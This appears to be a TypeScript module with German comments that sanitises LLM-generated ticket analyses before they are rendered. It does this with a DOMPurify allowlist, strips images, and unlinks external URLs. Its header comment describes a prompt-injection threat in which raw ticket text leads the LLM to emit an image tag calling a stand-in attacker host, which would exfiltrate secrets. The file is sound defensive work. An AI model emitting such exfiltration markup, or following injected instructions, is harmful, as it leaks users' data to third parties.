import { marked } from "marked";
import DOMPurify from "dompurify";

/**
 * Tickets Teil 2 — sicheres Rendern von `analyse.md`/`plan.md`.
 *
 * Diese Texte schreibt ein LLM, das den ROHEN Ticket-Text (Melder-Eingabe)
 * gelesen hat. Eine Prompt-Injection kann versuchen, eigenes Markdown/HTML in
 * die Ausgabe zu schmuggeln — das Markdown gilt deshalb als **nicht
 * vertrauenswürdig**, genau wie eingehende Mail-HTML (siehe
 * `mail/SandboxedMailBody.tsx`). Anders als dort reicht ein reines
 * Tag-Verbot nicht: Ein `<img src="https://angreifer/?q=<secret>">` wäre auch
 * ohne Script ein Exfiltrations-Kanal (der Browser lädt das Bild und trägt
 * damit Daten aus dem Analysetext nach draußen), sobald das sanitisierte HTML
 * in den DOM eingehängt wird. Deshalb:
 *
 *  - Strikte Allowlist: nur Text-/Struktur-Tags (Absätze, Überschriften,
 *    Listen, Code, Zitate, Tabellen, Links) und nur `href`/`title`. Damit
 *    fallen `<video src|poster>`, `<audio>`, `<source src|srcset>`,
 *    `<picture>`, `<input src>`, `background=`, `<svg><image href>`,
 *    `style=` usw. grundsätzlich weg — keine Liste von Verboten, die man
 *    vergessen kann zu erweitern.
 *  - JEDES `<img>` wird durch den Platzhaltertext „[Bild entfernt]“ ersetzt —
 *    unabhängig von der Quelle, für rohes HTML ebenso wie `![alt](url)`.
 *  - Links bleiben NUR klickbar, wenn sie strikt intern sind (siehe
 *    `istInternerLink`). Jeder andere Link wird zu reinem, nicht klickbarem
 *    Text mit der sichtbaren URL.
 *  - `javascript:`/`data:`-URLs erreichen den Hook gar nicht erst: Sie fallen
 *    schon bei DOMPurifys eigener `ALLOWED_URI_REGEXP`-Prüfung heraus.
 *
 * Die Hooks hängen an einer EIGENEN DOMPurify-Instanz. DOMPurify-Hooks an der
 * globalen Instanz gelten für JEDEN Aufrufer — Mail-Anzeige, composeSanitize,
 * Notizblöcke und TerminNotizen verloren dadurch Bilder und klickbare Links.
 */

/** Nur diese Tags überleben — alles andere entfernt DOMPurify (Inhalt bleibt als Text). */
const ERLAUBTE_TAGS = [
  "p", "br", "hr", "h1", "h2", "h3", "h4", "h5", "h6",
  "ul", "ol", "li", "strong", "em", "del", "code", "pre", "blockquote",
  "a", "table", "thead", "tbody", "tr", "th", "td",
];
const ERLAUBTE_ATTRIBUTE = ["href", "title"];

// Nur Schemata, die überhaupt einen sinnvollen Link ergeben, dürfen die
// href-Prüfung von DOMPurify passieren — alles andere (allen voran
// `javascript:`/`data:`/`vbscript:`) wird dort bereits als Attribut
// gestrichen, BEVOR unser Hook läuft. http(s)/mailto/tel überleben diese
// Prüfung absichtlich (damit der Hook unten die echte URL noch als Text
// zeigen kann) und werden danach — außer bei internen Pfaden — trotzdem
// entklickt.
const ERLAUBTE_URI = /^(?:https?:|mailto:|tel:|\/(?!\/))/i;

// Steuer- und Leerzeichen (inkl. Unicode-Leerraum): Browser entfernen z. B.
// TAB/LF beim URL-Parsen still — aus „/<TAB>/evil“ würde „//evil“.
// eslint-disable-next-line no-control-regex
const STEUER_ODER_LEERZEICHEN = /[\u0000-\u0020\u007f-\u009f\s]/;

/**
 * Ein Link ist nur dann intern, wenn er
 *  - mit genau EINEM „/“ beginnt (nicht „//…“ = protokoll-relativ, nicht
 *    „/\…“ — Browser lesen „\“ wie „/“),
 *  - keine Steuer- oder Leerzeichen enthält und
 *  - aufgelöst gegen die eigene Herkunft auch wirklich dort bleibt.
 */
export function istInternerLink(href: string | null | undefined): boolean {
  if (!href) return false;
  if (!href.startsWith("/") || href.startsWith("//") || href.startsWith("/\\")) return false;
  if (STEUER_ODER_LEERZEICHEN.test(href)) return false;
  try {
    return new URL(href, window.location.origin).origin === window.location.origin;
  } catch {
    return false;
  }
}

let instanz: ReturnType<typeof DOMPurify> | null = null;

/** Eigene, einmal eingerichtete DOMPurify-Instanz — die globale bleibt unberührt. */
function purify(): ReturnType<typeof DOMPurify> {
  if (instanz) return instanz;
  const p = DOMPurify(window);

  // Bilder NIE ins DOM lassen — weder `<img>` aus rohem HTML noch aus
  // `![alt](url)`. `uponSanitizeElement` läuft für jedes Element, bevor
  // DOMPurify selbst über Tag und Attribute entscheidet.
  p.addHook("uponSanitizeElement", (node, data) => {
    if (data.tagName !== "img") return;
    const ersatz = (node.ownerDocument ?? document).createTextNode("[Bild entfernt]");
    node.parentNode?.replaceChild(ersatz, node);
  });

  // Links: nach DOMPurifys eigener Attribut-Säuberung (href ist entweder
  // schon weg — z. B. `javascript:` — oder eines der oben erlaubten Schemata)
  // entscheidet dieser Hook, ob der Link klickbar bleiben darf.
  p.addHook("afterSanitizeAttributes", (node) => {
    if (node.tagName !== "A") return;
    const href = node.getAttribute("href");
    if (istInternerLink(href)) return; // bleibt ein echter Link

    // Kein interner Pfad (oder gar kein href mehr, z. B. nach `javascript:`)
    // → der Link wird zu reinem Text. Ist noch eine URL übrig, zeigen wir
    // GENAU die (nicht den — potenziell irreführenden — Linktext); sonst den
    // ursprünglichen Linktext.
    const anzeige = href || node.textContent || "";
    const ersatz = (node.ownerDocument ?? document).createTextNode(anzeige);
    node.parentNode?.replaceChild(ersatz, node);
  });

  instanz = p;
  return p;
}

/**
 * Rendert Ticket-Vorschlag-Markdown (`analyse.md`/`plan.md`) sicher als HTML
 * für `dangerouslySetInnerHTML`. Leer/`null`/`undefined` → `""`.
 */
export function markdownSicherRendern(markdown: string): string {
  if (!markdown) return "";

  const roh = marked.parse(markdown, { async: false }) as string;

  return purify().sanitize(roh, {
    ALLOWED_TAGS: ERLAUBTE_TAGS,
    ALLOWED_ATTR: ERLAUBTE_ATTRIBUTE,
    ALLOWED_URI_REGEXP: ERLAUBTE_URI,
    // Keine SVG-/MathML-Profile, keine data-*-Attribute.
    ALLOW_DATA_ATTR: false,
  });
}
